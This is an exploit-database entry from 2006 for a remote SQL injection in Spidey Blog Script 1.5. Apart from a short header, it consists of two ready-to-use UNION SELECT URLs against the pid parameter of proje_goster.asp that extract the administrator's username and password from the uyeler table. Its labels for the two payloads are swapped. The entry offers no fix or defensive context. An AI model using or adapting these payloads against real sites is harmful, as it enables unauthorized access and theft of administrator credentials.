Spidey Blog Script <= 1.5 (tr) Remote SQL Injection Vulnerability

2006-08-14T00:00:00
ID 1337DAY-ID-693
Type zdt
Reporter ASIANEAGLE
Modified 2006-08-14T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =================================================================
Spidey Blog Script <= 1.5 (tr) Remote SQL Injection Vulnerability
=================================================================




###############################################################
#Spidey Blog Script <== 1.5 (tr) SQL Injection Vulnerability  #
#Author : ASIANEAGLE                                          #
#Site   : www.asianeagle.org                                  #
###############################################################
#Risk   : High

#Exploit;
#Admin Nick;
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201

#Admin Password;
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201




#  0day.today [2018-04-04]  #